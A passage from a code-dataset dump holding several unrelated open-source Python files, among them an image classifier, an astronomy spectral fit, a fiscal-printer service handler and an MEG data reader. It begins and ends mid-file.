models.vgg16(pretrained=True) \n\n #Freezing our fetures grediance \n for param in model.parameters():\n param.requires_grad = False\n \n #from checkpoint \n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n model.class_to_idx = checkpoint['class_to_idx']\n \n return model\n\n# Scales, crops, and normalizes a PIL image for a PyTorch model returns an Numpy array\ndef process_image(image):\n #Open the image\n check_image = Image.open(image)\n \n #Check the image size\n orig_width, orig_height = check_image.size\n\n #Change the size in the aspect ratio\n if orig_width < orig_height:\n change_size=[256, 256**600]\n else:\n change_size=[256**600, 256]\n \n check_image.thumbnail(size = 
change_size)\n    \n    #crop a 224x224 box around the center of the resized image\n    new_width, new_height = check_image.size\n    center = new_width/2, new_height/2\n\n    left = center[0]-(224/2)\n    upper = center[1]-(224/2)\n    right = center[0]+(224/2)\n    lower = center[1]+(224/2)\n    \n    check_image = check_image.crop((left, upper, right, lower))\n    \n    #Color channels as floats\n    np_image = np.array(check_image)/255\n    \n    #Image normalization\n    norm_means = [0.485, 0.456, 0.406]\n    norm_sd = [0.229, 0.224, 0.225]\n    \n    np_image = (np_image-norm_means)/norm_sd\n    \n    #Color channel as first dimension\n    np_image = np_image.transpose(2, 0, 1)\n    \n    return np_image\n\ndef predict(image_path, model, topk, device):\n    \n    if device == 'cuda':\n        model.to('cuda')\n    else:\n        model.to('cpu')\n    \n    torch_image = torch.from_numpy(np.expand_dims(process_image(image_path), axis=0)).type(torch.FloatTensor)\n    \n    logps = model.forward(torch_image)\n    linps = torch.exp(logps)\n    \n    top_probs, top_labels = linps.topk(topk)\n    top_probs = top_probs.cpu()\n    top_labels = top_labels.cpu()\n    top_probs = top_probs.tolist()[0]\n    top_labels = top_labels.tolist()[0]\n    \n    class_to_idx = {val: key for key, val in model.class_to_idx.items()}\n    classes = [class_to_idx[item] for item in top_labels]\n    classes = np.array(classes) \n    \n    return top_probs, top_labels, classes\n\n#File path argument\nfile_path = results.image_dir\n\n#GPU if provided\nif results.gpu == 'gpu':\n    device = 'cuda'\nelse:\n    device = 'cpu'\n\n#Category name if provided, else, take the default\nif results.category_names:\n    with open(results.category_names, 'r') as f:\n        cat_to_name = json.load(f)\nelse:\n    with open('cat_to_name.json', 'r') as f:\n        cat_to_name = json.load(f)\n    pass\n\n#Loading the model from the checkpoint\nmodel = load_checkpoint(results.check_dir)\n\n#Number of TOP_K \nif results.topk:\n    top_k = results.topk\nelse:\n    top_k = 5\n\n#Call the predict function and make predictions\ntop_probs, top_labels, classes = predict(file_path, model, top_k, device)\n\n\n#Taking the class names from the classes\nclass_names = [cat_to_name[item] for item in classes]\n\n#Print the results\nfor cl in range(len(class_names)):\n    print(\"Probability level: {}/{} \".format(cl+1, top_k),\n          \"Class name: {} \".format(class_names[cl]),\n          \"Probability: {:.3f}% \".format(top_probs[cl]*100),\n         )\n","repo_name":"Natialuk/Image-classifier","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1055928387","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom scipy.optimize import curve_fit\nfrom milkbot.formulas import ecm_milk, milkbot_\n\ndf = pd.read_csv(\"docs/example1.csv\")\n\n# Plot Pct Fat / Protein v DIM\nX = df['DIM'].values.reshape(-1,1)\nregf = LinearRegression().fit(X[1:], df['PCTF'].iloc[1:].values)\nregp = LinearRegression().fit(X[1:], df['PCTP'].iloc[1:].values)\ndf['PCTF_EST'] = regf.predict(X)\ndf['PCTP_EST'] = regp.predict(X)\nplt.plot(df['DIM'],df['PCTF'],'ro',label=\"PCTF\")\nplt.plot(df['DIM'],df['PCTF_EST'],'r--',label=\"PCTF_EST\")\nplt.plot(df['DIM'],df['PCTP'],'go',label=\"PCTP\")\nplt.plot(df['DIM'],df['PCTP_EST'],'g--',label=\"PCTP_EST\")\nplt.legend()\nplt.grid()\nplt.savefig('docs/pctf_pctp_by_dim.png', bbox_inches='tight')\nplt.close()\n\n# Plot MILK v DIM\ndim = np.arange(df['DIM'].max())\nsoln, _ = curve_fit(milkbot_, df.DIM, df.MILK, p0=np.array([85.0, 50, -90, 0.0009]))\nmilk_est = milkbot_(dim, 
*soln)\nplt.plot(df['DIM'],df['MILK'],'ro')\nplt.plot(dim,milk_est,'b-')\nplt.grid()\nplt.savefig('docs/milk_by_dim.png', bbox_inches='tight')\nplt.close()\n\n# Plot ECM v DIM\ndf['ECM_RAW'] = df.apply(lambda x: ecm_milk(x.MILK, x.PCTF, x.PCTP), axis=1)\necm_raw_soln, _ = curve_fit(milkbot_, df.DIM, df.ECM_RAW, \n p0=np.array([df['ECM_RAW'].max(), 50, -90, 0.0009]))\necm_raw_est = milkbot_(dim, *ecm_raw_soln)\ndf['ECM'] = df.apply(lambda x: ecm_milk(x.MILK, x.PCTF_EST, x.PCTP_EST), axis=1)\necm_soln, _ = curve_fit(milkbot_, df.DIM, df.ECM, p0=np.array([df['ECM'].max(), 50, -90, 0.0009]))\necm_est = milkbot_(dim, *ecm_soln)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4), sharey=True)\nax1.plot(df['DIM'],df['ECM_RAW'],'ko',label='ECM_RAW')\nax2.plot(df['DIM'],df['ECM'],'bo',label='ECM')\nax1.plot(dim,ecm_raw_est,'k:',label='ECM_RAW_EST')\nax2.plot(dim,ecm_est,'b:',label='ECM_EST')\nax1.legend()\nax2.legend()\nax1.grid()\nax2.grid()\nfig.suptitle('ECM Estimation: Raw v Using Estimated % Fat and % Protein')\nplt.savefig('docs/ecm_raw_by_dim.png', bbox_inches='tight')\nplt.close()\n\n","repo_name":"YanniPapadakis-Zoetis/ECM_Milkbot","sub_path":"ecm_estimation.py","file_name":"ecm_estimation.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24210294370","text":"import cv2\nimport numpy as np\nimport pytest\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom piqa.image_processing import detect_paragraphs\n\ndef create_test_image(text: str, width: int, height: int, font_size: int, filename: str) -> None:\n image = Image.new('RGB', (width, height), color=(255, 255, 255))\n font = ImageFont.load_default()\n draw = ImageDraw.Draw(image)\n draw.text((10, 10), text, font=font, fill=(0, 0, 0))\n image.save(f\"tests/data/images/{filename}\")\n\ndef generate_test_images() -> None:\n print(\"CREATING TEST IMAGES\")\n text_single_paragraph = \"This is a single paragraph. 
It has multiple lines and sentences, but it is still a single paragraph.\"\n text_two_paragraphs = \"This is the first paragraph.\\n\\nThis is the second paragraph.\"\n text_paragraphs_with_space = \"Paragraph 1\\n\\nParagraph 2\\n\\nParagraph 3\"\n\n create_test_image(text_single_paragraph, 300, 100, 16, \"single_paragraph.png\")\n create_test_image(text_two_paragraphs, 300, 150, 16, \"two_paragraphs.png\")\n create_test_image(text_paragraphs_with_space, 300, 200, 16, \"paragraphs_with_space.png\")\n\n# Temporarily disabled; This feature is to be built in the future\n\n# def test_detect_paragraphs_empty_image() -> None:\n# empty_image = np.zeros((100, 100), dtype=np.uint8)\n# cv2.imwrite(\"data/images/empty_image.png\", empty_image)\n\n# thresh, dilate, image = detect_paragraphs(\"data/images/empty_image.png\")\n\n# assert np.array_equal(thresh, empty_image)\n# assert np.array_equal(dilate, empty_image)\n# assert np.array_equal(image, cv2.cvtColor(empty_image, cv2.COLOR_GRAY2BGR))\n\n# def test_detect_paragraphs_no_text_image() -> None:\n# no_text_image = np.ones((100, 100), dtype=np.uint8) * 255\n# cv2.imwrite(\"data/images/no_text_image.png\", no_text_image)\n\n# thresh, dilate, image = detect_paragraphs(\"data/images/no_text_image.png\")\n\n# assert np.array_equal(thresh, no_text_image)\n# assert np.array_equal(dilate, no_text_image)\n# assert np.array_equal(image, cv2.cvtColor(no_text_image, cv2.COLOR_GRAY2BGR))\n\n# def test_detect_paragraphs_invalid_path() -> None:\n# with pytest.raises(cv2.error):\n# detect_paragraphs(\"invalid_path.png\")\n\n# def test_detect_paragraphs_single_paragraph() -> None:\n# single_paragraph = cv2.imread(\"data/images/single_paragraph.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/single_paragraph.png\")\n\n# assert len(rectangles) == 1\n\n# def test_detect_paragraphs_two_paragraphs() -> None:\n# two_paragraphs = cv2.imread(\"data/images/two_paragraphs.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/two_paragraphs.png\")\n\n# assert len(rectangles) == 2\n\n# def test_detect_paragraphs_paragraphs_with_space() -> None:\n# paragraphs_with_space = cv2.imread(\"data/images/paragraphs_with_space.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/paragraphs_with_space.png\")\n\n# assert len(rectangles) == 3\n","repo_name":"vliegenthart/PiQA","sub_path":"tests/image_processing/test_image_operations.py","file_name":"test_image_operations.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73872362384","text":"from Mips_table import *\n\narq = input(\"Digite o nome do arquivo: \")\nfile = open(arq, 'r')\nprint('')\nfor cmd in file:\n cmd = cmd.replace('\\n','')\n inst, regs = split_cmd(cmd)\n reg_tipe= code_order(inst)\n code = code_inst(inst)\n print(cmd)\n i=0\n for reg in regs:\n code = replace_code(code, reg_tipe[i], code_reg(reg))\n i+=1\n print(code)\n print(bin_to_hex(code))\ninput(\"\\n========================\\nPressione enter pra sair\")\n","repo_name":"Citeli-py/Mips-Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"871523434","text":"from auxiliary.io_utility import IOUtility\n\n\nclass SignalProcessorUtility(IOUtility):\n\n def __init__(self, data=None):\n super().__init__(data)\n self.data = data\n\n def read(self):\n \"\"\"\n Incorporate all 
signals from every antenna into a single flat list\n :return: list of the signal sequences, in iteration order\n \"\"\"\n integrated_signals = []\n for antennas, content in self.data.items():\n for index, signals in content.items():\n integrated_signals.append(\n signals\n )\n return integrated_signals\n\n def pack(self, filtered_signals):\n \"\"\"\n Pack the processed results back into the original nested dictionary,\n relying on the same iteration order that read() used\n :param filtered_signals:\n :return:\n \"\"\"\n i = 0\n for antennas, content in self.data.items():\n for index, signals in content.items():\n self.data[antennas][index] = filtered_signals[i]\n i += 1\n return self.data\n","repo_name":"qiwliu/heart_rate_analyzer","sub_path":"src/auxiliary/signal_processor_utility.py","file_name":"signal_processor_utility.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9886165501","text":"import re\nimport pathlib\nimport ifcopenshell\nimport ifcopenshell.util.schema\nfrom ifcopenshell.entity_instance import entity_instance\nfrom functools import lru_cache\nfrom typing import List, Generator, Optional\n\ntemplates = {}\n\n\ndef get_template(schema):\n global templates\n if schema not in templates:\n templates[schema] = PsetQto(schema)\n return templates[schema]\n\n\nclass PsetQto:\n templates_path = {\n \"IFC4\": \"Pset_IFC4_ADD2.ifc\",\n }\n\n def __init__(self, schema: str, templates=None) -> None:\n self.schema = ifcopenshell.ifcopenshell_wrapper.schema_by_name(schema)\n if not templates:\n folder_path = pathlib.Path(__file__).parent.absolute()\n path = str(folder_path.joinpath(\"schema\", self.templates_path[schema]))\n templates = [ifcopenshell.open(path)]\n self.templates = templates\n\n @lru_cache()\n def get_applicable(\n self, ifc_class=\"\", predefined_type=\"\", pset_only=False, qto_only=False\n ) -> List[entity_instance]:\n any_class = not ifc_class\n if not any_class:\n entity = self.schema.declaration_by_name(ifc_class)\n result = []\n for template in self.templates:\n for prop_set in template.by_type(\"IfcPropertySetTemplate\"):\n if pset_only:\n if prop_set.Name.startswith(\"Qto_\"):\n continue\n if qto_only:\n if not prop_set.Name.startswith(\"Qto_\"):\n continue\n if any_class or self.is_applicable(entity, prop_set.ApplicableEntity or \"IfcRoot\", predefined_type):\n result.append(prop_set)\n return result\n\n @lru_cache()\n def get_applicable_names(self, ifc_class: str, predefined_type=\"\", pset_only=False, qto_only=False) -> List[str]:\n \"\"\"Return pset names instead of objects, for other uses such as an 
enum\"\"\"\n return [prop_set.Name for prop_set in self.get_applicable(ifc_class, predefined_type, pset_only, qto_only)]\n\n def is_applicable(self, entity: entity_instance, applicables: str, predefined_type=\"\") -> bool:\n \"\"\"applicables can have multiple possible patterns :\n IfcBoilerType (IfcClass)\n IfcBoilerType/STEAM (IfcClass/PREDEFINEDTYPE)\n IfcBoilerType[PerformanceHistory] (IfcClass[PerformanceHistory])\n IfcBoilerType/STEAM[PerformanceHistory] (IfcClass/PREDEFINEDTYPE[PerformanceHistory])\n \"\"\"\n for applicable in applicables.split(\",\"):\n match = re.match(r\"(\\w+)(\\[\\w+\\])*/*(\\w+)*(\\[\\w+\\])*\", applicable)\n if not match:\n continue\n # Uncomment if usage found\n # applicable_perf_history = match.group(2) or match.group(4)\n if predefined_type and predefined_type != match.group(3):\n continue\n\n applicable_class = match.group(1)\n if ifcopenshell.util.schema.is_a(entity, applicable_class):\n return True\n return False\n\n @lru_cache()\n def get_by_name(self, name: str) -> Optional[entity_instance]:\n for template in self.templates:\n for prop_set in template.by_type(\"IfcPropertySetTemplate\"):\n if prop_set.Name == name:\n return prop_set\n return None\n\n def is_templated(self, name: str) -> bool:\n return bool(self.get_by_name(name))\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/util/pset.py","file_name":"pset.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"28127332571","text":"# coding=utf-8\n\nimport json\nimport Configberry\nimport importlib\nimport socket\nimport threading\nimport tornado.ioloop\nimport os\nfrom multiprocessing import Process, Queue, Pool\n\nimport sys\nif sys.platform == 'win32':\n import multiprocessing.reduction # make sockets pickable/inheritable\n\n\nINTERVALO_IMPRESORA_WARNING = 30.0\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef set_interval(func, sec):\n def func_wrapper():\n set_interval(func, sec)\n func()\n\n t = threading.Timer(sec, func_wrapper)\n t.start()\n return t\n\n\n# es un diccionario como clave va el nombre de la impresora que funciona como cola\n# cada KEY es una printerName y contiene un a instancia de TraductorReceipt o TraductorFiscal dependiendo\n# si la impresora es fiscal o receipt\n\nclass TraductorException(Exception):\n pass\n\n\n\ndef init_printer_traductor(printerName):\n config = Configberry.Configberry()\n\n try:\n dictSectionConf = config.get_config_for_printer(printerName)\n except KeyError as e:\n raise TraductorException(\"En el archivo de configuracion no existe la impresora: '%s'\" % printerName)\n\n marca = dictSectionConf.get(\"marca\")\n del dictSectionConf['marca']\n # instanciar los comandos dinamicamente\n libraryName = \"Comandos.\" + marca + \"Comandos\"\n comandoModule = importlib.import_module(libraryName)\n comandoClass = getattr(comandoModule, marca + \"Comandos\")\n \n comando = comandoClass(**dictSectionConf)\n return comando.traductor\n\ndef runTraductor(jsonTicket, queue):\n logging.info(\"mandando comando de impresora\")\n printerName = jsonTicket['printerName']\n traductor = init_printer_traductor(printerName)\n\n if traductor:\n if traductor.comando.conector is not None:\n queue.put(traductor.run(jsonTicket))\n else:\n strError = \"el Driver no esta inicializado para la impresora %s\" % printerName\n queue.put(strError)\n logging.error(strError)\n\n\n\n\nclass TraductoresHandler:\n \"\"\"Convierte 
un JSON a Comando Fiscal Para Cualquier tipo de Impresora fiscal\"\"\"\n\n traductores = {}\n fbApp = None\n\n config = Configberry.Configberry()\n webSocket = None\n\n def __init__(self, webSocket = None, fbApp = None):\n self.webSocket = webSocket\n self.fbApp = fbApp\n\n\n\n\n def json_to_comando(self, jsonTicket):\n import time \n traductor = None\n \n try:\n \"\"\" leer y procesar una factura en formato JSON\n \"\"\"\n logging.info(\"Iniciando procesamiento de json:::: \"+json.dumps(jsonTicket))\n\n rta = {\"rta\": \"\"}\n # seleccionar impresora\n # esto se debe ejecutar antes que cualquier otro comando\n if 'printerName' in jsonTicket:\n # run multiprocessing\n q = Queue()\n p = Process(target=runTraductor, args=(jsonTicket,q))\n p.daemon = True\n #p = MultiprocesingTraductor(traductorhandler=self, jsonTicket=jsonTicket, q=q)\n p.start()\n p.join()\n if q.empty() == False:\n rta[\"rta\"] = q.get(timeout=1)\n q.close()\n\n # aciones de comando genericos de Ststus y control\n elif 'getStatus' in jsonTicket:\n rta[\"rta\"] = self._getStatus()\n\n # reinicia\n elif 'reboot' in jsonTicket:\n rta[\"rta\"] = self._reboot()\n\n elif 'restart' in jsonTicket:\n rta[\"rta\"] = self._restartService()\n\n elif 'upgrade' in jsonTicket:\n rta[\"rta\"] = self._upgrade()\n\n elif 'getPrinterInfo' in jsonTicket:\n rta[\"rta\"] = self._getPrinterInfo(jsonTicket[\"getPrinterInfo\"])\n\n elif 'findAvaliablePrinters' in jsonTicket:\n self._findAvaliablePrinters()\n rta[\"rta\"] = self._getAvaliablePrinters()\n\n elif 'getAvaliablePrinters' in jsonTicket:\n rta[\"rta\"] = self._getAvaliablePrinters()\n\n elif 'getActualConfig' in jsonTicket:\n rta[\"rta\"] = self._getActualConfig()\n\n elif 'configure' in jsonTicket:\n rta[\"rta\"] = self._configure(**jsonTicket[\"configure\"])\n\n elif 'removerImpresora' in jsonTicket:\n rta[\"rta\"] = self._removerImpresora(jsonTicket[\"removerImpresora\"])\n\n else:\n\n logger.error(\"No se pasó un comando válido\")\n raise TraductorException(\"No se pasó un comando válido\")\n\n # cerrar el driver\n if traductor and traductor.comando:\n traductor.comando.close()\n\n return rta\n\n except Exception as e:\n # cerrar el driver\n if traductor and traductor.comando:\n traductor.comando.close()\n\n raise\n\n def getWarnings(self):\n \"\"\" Recolecta los warning que puedan ir arrojando las impresoraas\n devuelve un listado de warnings\n \"\"\"\n collect_warnings = {}\n for trad in self.traductores:\n if self.traductores[trad]:\n warn = self.traductores[trad].comando.getWarnings()\n if warn:\n collect_warnings[trad] = warn\n return collect_warnings\n\n def _upgrade(self):\n ret = self.fbApp.upgradeGitPull()\n print(ret)\n rta = {\n \"rta\": ret\n }\n self.fbApp.restart_service()\n return rta\n\n def _getPrinterInfo(self, printerName):\n rta = {\n \"printerName\": printerName,\n \"action\": \"getPrinterInfo\",\n \"rta\": self.config.get_config_for_printer(printerName)\n }\n print(rta)\n return rta\n\n def _restartService(self):\n \"\"\" Reinicializa el WS server tornado y levanta la configuracion nuevamente \"\"\"\n self.fbApp.restart_service()\n resdict = {\n \"action\": \"restartService\",\n \"rta\": \"servidor reiniciado\"\n }\n\n def _rebootFiscalberry(self):\n \"reinicia el servicio fiscalberry\"\n from subprocess import call\n\n resdict = {\n \"action\": \"rebootFiscalberry\",\n \"rta\": call([\"reboot\"])\n }\n\n return resdict\n\n def _configure(self, **kwargs):\n \"Configura generando o modificando el archivo configure.ini\"\n printerName = kwargs[\"printerName\"]\n 
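# NOTE (editor's addition): if \"nombre_anterior\" is present it marks a rename;\n # the old section is removed via _removerImpresora before the remaining kwargs\n # are written out as the new printer section.\n 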
propiedadesImpresora = kwargs\n if \"nombre_anterior\" in kwargs:\n self._removerImpresora(kwargs[\"nombre_anterior\"])\n del propiedadesImpresora[\"nombre_anterior\"]\n del propiedadesImpresora[\"printerName\"]\n self.config.writeSectionWithKwargs(printerName, propiedadesImpresora)\n\n return {\n \"action\": \"configure\",\n \"rta\": \"La seccion \"+printerName+\" ha sido guardada\"\n }\n\n def _removerImpresora(self, printerName):\n \"removes the printer's section from config.ini\"\n\n self.config.delete_printer_from_config(printerName)\n\n return {\n \"action\": \"removerImpresora\",\n \"rta\": \"La impresora \"+printerName+\" fue removida con exito\"\n }\n\n\n def _findAvaliablePrinters(self):\n # This function calls another one that searches for printers, then writes the printers it finds into config.ini.\n if os.geteuid() != 0:\n return {\"action\": \"findAvaliablePrinters\",\n \"rta\": \"Error, no es superusuario (%s)\" % os.geteuid()\n }\n\n self.__getPrintersAndWriteConfig()\n\n def _getAvaliablePrinters(self):\n\n # the first section corresponds to SERVER, the remaining ones are the printers\n rta = {\n \"action\": \"getAvaliablePrinters\",\n \"rta\": self.config.sections()[1:]\n }\n\n return rta\n\n def _getStatus(self, *args):\n\n resdict = {\"action\": \"getStatus\", \"rta\": {}}\n for tradu in self.traductores:\n if self.traductores[tradu]:\n resdict[\"rta\"][tradu] = \"ONLINE\"\n else:\n resdict[\"rta\"][tradu] = \"OFFLINE\"\n return resdict\n\n def __manejar_socket_error(self, err, jsonTicket, traductor):\n print(format(err))\n traductor.comando.conector.driver.reconnect()\n # retry the same command\n rta = {\"rta\": \"\"}\n try:\n rta[\"rta\"] = traductor.run(jsonTicket)\n return rta\n except Exception:\n # ok, it will not connect, carry on without doing anything\n print(\"No hay caso, probe de reconectar pero no se pudo\")\n\n def _getActualConfig(self):\n rta = {\n \"action\": \"getActualConfig\",\n \"rta\": self.config.get_actual_config()\n }\n\n return rta\n","repo_name":"paxapos/fiscalberry","sub_path":"Traductores/TraductoresHandler.py","file_name":"TraductoresHandler.py","file_ext":"py","file_size_in_byte":8765,"program_lang":"python","lang":"es","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"35398136113","text":"import numpy as np\nimport VoigtFit\nimport matplotlib\nmatplotlib.use(\"GTKAgg\")\n\n\n# -- Add the redshift of the cloud doing the absorption\n# Estimating 0 for everything.\nz = 0.0\n\ndataset = VoigtFit.DataSet(z)\ndataset.set_name(\"NGC3125-SiIV\")\ndataset.verbose = True\n\n\n# -- If log(NHI) is not known use:\nlogNHI = None\n\n\n# -- Rebin the data set by 3 pixels\n\ndef downsample_1d(myarr,factor):\n \"\"\"\n Downsample a 1D array by averaging over *factor* pixels.\n Crops right side if the shape is not a multiple of factor.\n\n Got this specific function from \"Adam Ginsburg's python codes\" on agpy\n myarr : numpy array\n\n factor : how much you want to rebin the array by\n \"\"\"\n xs = myarr.shape[0]\n crarr = myarr[:xs-(xs % int(factor))]\n dsarr = np.mean( np.concatenate(\n [[crarr[i::factor] for i in range(factor)] ]\n ),axis=0)\n\n return dsarr\n\n\n# -- Load the COS data (G130M and G160M if available) in ASCII format:\nG130M_filename = \"/Users/efrazer/leadingarm/sightlines/NGC3125/NGC3125-G130M\"\n\nres_g130m = 16000.\n\nwl_g130m, spec_g130m, err_g130m = np.loadtxt(G130M_filename, unpack=True)\n\nwl_g130m_rb = downsample_1d(wl_g130m, 3)\nspec_g130m_rb = downsample_1d(spec_g130m, 3)\nerr_g130m_rb = downsample_1d(err_g130m, 
3)\n\ndataset.add_data(wl_g130m_rb, spec_g130m_rb, 299792.458/res_g130m, err=err_g130m_rb, normalized=False)\n\n# Night only data:\n# G130M_filename_n = \"/Users/efrazer/leadingarm/sightlines/NGC3125/NGC3125-G130M-N\"\n#\n# res_g130m_n = 16000.\n#\n# wl_g130m_n, spec_g130m_n, err_g130m_n = np.loadtxt(G130M_filename_n, unpack=True)\n#\n# wl_g130m_rb_n = downsample_1d(wl_g130m_n, 3)\n# spec_g130m_rb_n = downsample_1d(spec_g130m_n, 3)\n# err_g130m_rb_n = downsample_1d(err_g130m_n, 3)\n#\n# dataset.add_data(wl_g130m_rb_n, spec_g130m_rb_n, 299792.458/res_g130m, err=err_g130m_rb_n, normalized=False)\n\n\n# -- Change the width of velocity search region\ndataset.velspan = 500.0\n\n\n# -- Add the ions we want to fit\n\n# ION WAVELENGTH F_VALUE\n# C II 1334.5323 0.127800\n# C IV 1548.2049 1.908E-01\n# C IV 1550.7785 9.522E-02\n# SiIV 1393.7550 5.280E-01\n# SiIV 1402.7700 2.620E-01\n# SiIII 1206.5000 1.660E+00\n# SiII 1260.4221 1.007E+00\n# SiII 1193.2897 4.991E-01\n# SiII 1190.4158 2.502E-01\n\n# dataset.add_line(\"CII_1334\")\n# dataset.add_line(\"SiII_1260\")\n# dataset.add_line(\"SiII_1193\") # blended\n# dataset.add_line(\"SiII_1190\") # blended\n# dataset.add_line(\"SiIII_1206\")\ndataset.add_line(\"SiIV_1393\")\ndataset.add_line(\"SiIV_1402\")\n# dataset.add_line(\"OI_1302\")\n\n# NOTES ABOUT THE DETECTIONS:\n# log N(C II) is an upper limit. Line is blended.\n# log N(Si IV) is an upper limit. Line is blended.\n\n\n# -- Add MW components for each ion:\n\n# SiII\n# ion z b logN\n# dataset.add_component(\"SiII\", 0., 60.0, 13.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiII\", 120, 20.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiII\", 190, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n\n# SiIII\n# dataset.add_component(\"SiIII\", 0., 60.0, 13.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 120, 20.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 190, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 210, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n\n# Si IV\ndataset.add_component(\"SiIV\", 0., 47.0, 13.5, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIV\", 110, 15.0, 12.1, var_z=1, var_b=1, var_N=1)\ndataset.add_component_velocity(\"SiIV\", 200, 15.0, 12.1, var_z=1, var_b=1, var_N=1)\n\n# OI\n# dataset.add_component(\"OI\", 0., 40.0, 14.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"OI\", 110, 40.0, 14.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"OI\", 200, 30.0, 14.1, var_z=1, var_b=1, var_N=1)\n\n\n# -- Prepare the dataset: This will prompt the user for interactive\n# masking and normalization, as well as initiating the Parameters:\n\ndataset.cheb_order = 1\n# dataset.cheb_order = -1\n# dataset.norm_method = 'spline'\ndataset.prepare_dataset(norm=True, mask=True)\n\n\n# -- Fit the dataset:\npopt, chi2 = dataset.fit()\n\ndataset.plot_fit(filename=\"NGC3125-SiIV.pdf\", max_rows=6)\n\n\n# -- Save the dataset to file: taken from the dataset.name\ndataset.save()\ndataset.save_parameters(\"NGC3125-SiIV.fit\")\ndataset.save_cont_parameters_to_file(\"NGC3125-SiIV.cont\")\ndataset.save_fit_regions(\"NGC3125-SiIV.reg\")\n\n","repo_name":"emsnyder/leadingarm","sub_path":"sightlines/NGC3125/badfits/vf_NGC3125.py","file_name":"vf_NGC3125.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"30233984469","text":"#!/usr/bin/python\n\"\"\"\n@author: goneill\n\"\"\"\n\nimport json\nimport numpy as np\nimport os.path as op\nfrom collections import OrderedDict\n\nfrom mne.io.constants import FIFF\nfrom mne.io.meas_info import _empty_info\nfrom mne.io.write import get_new_file_id\nfrom mne.io.base import BaseRaw\nfrom mne.io.utils import _read_segments_file\nfrom mne.io._digitization import _make_dig_points\nfrom mne.transforms import get_ras_to_neuromag_trans, apply_trans, Transform\nfrom mne.utils import warn\n\nfrom .utils import _refine_sensor_orientation, _determine_position_units, _size2units, _get_plane_vectors\n\ndef read_raw_ucl(binfile, precision='single', preload=False):\n return RawUCL(binfile, precision=precision, preload=preload)\n\nclass RawUCL(BaseRaw):\n def __init__(self, binfile, precision='single', preload=False):\n \n if precision == 'single':\n dt = np.dtype('>f')\n bps = 4\n else:\n dt = np.dtype('>d')\n bps = 8\n \n \n sample_info = dict()\n sample_info['dt'] = dt\n sample_info['bps'] = bps\n \n files = _get_file_names(binfile)\n \n chans = _from_tsv(files['chans'])\n chanpos = _from_tsv(files['positions'])\n nchans = len(chans['name'])\n nlocs = len(chanpos['name'])\n nsamples = _determine_nsamples(files['bin'], nchans, precision) - 1\n sample_info['nsamples'] = nsamples\n \n raw_extras = list()\n raw_extras.append(sample_info)\n \n chans['pos'] = [None] * nchans\n chans['ori'] = [None] * nchans \n \n for ii in range(0,nlocs):\n idx = chans['name'].index(chanpos['name'][ii])\n tmp = np.array([chanpos['Px'][ii], chanpos['Py'][ii], chanpos['Pz'][ii]])\n chans['pos'][idx] = tmp.astype(np.float64)\n tmp = np.array([chanpos['Ox'][ii], chanpos['Oy'][ii], chanpos['Oz'][ii]])\n chans['ori'][idx] = tmp.astype(np.float64)\n \n fid = open(files['meg'],'r')\n meg = json.load(fid)\n fid.close()\n info = _compose_meas_info(meg, chans)\n \n super(RawUCL, self).__init__(\n info, preload, filenames=[files['bin']],raw_extras=raw_extras,\n last_samps=[nsamples], orig_format=precision)\n \n if op.exists(files['coordsystem']):\n fid = open(files['coordsystem'],'r')\n csys = json.load(fid)\n fid.close()\n hc = csys['HeadCoilCoordinates']\n \n for key in hc:\n if key == 'lpa' or key == 'LPA':\n lpa = np.asarray(hc[key])\n elif key == 'rpa' or key == 'RPA':\n rpa = np.asarray(hc[key])\n elif key == 'nas' or key == 'NAS' or key == 'nasion':\n nas = np.asarray(hc[key])\n else:\n warn(key + ' is not a valid fiducial name!')\n \n \n siz = np.linalg.norm(nas - rpa)\n unit, sf = _size2units(siz) \n lpa/=sf\n rpa/=sf\n nas/=sf\n \n t = get_ras_to_neuromag_trans(nas, lpa, rpa)\n \n # transform fiducial points\n nas = apply_trans(t, nas)\n lpa = apply_trans(t, lpa)\n rpa = apply_trans(t, rpa)\n \n with self.info._unlock():\n self.info['dig'] = _make_dig_points(nasion=nas,\n lpa=lpa,\n rpa=rpa,\n coord_frame='meg')\n else:\n print('no 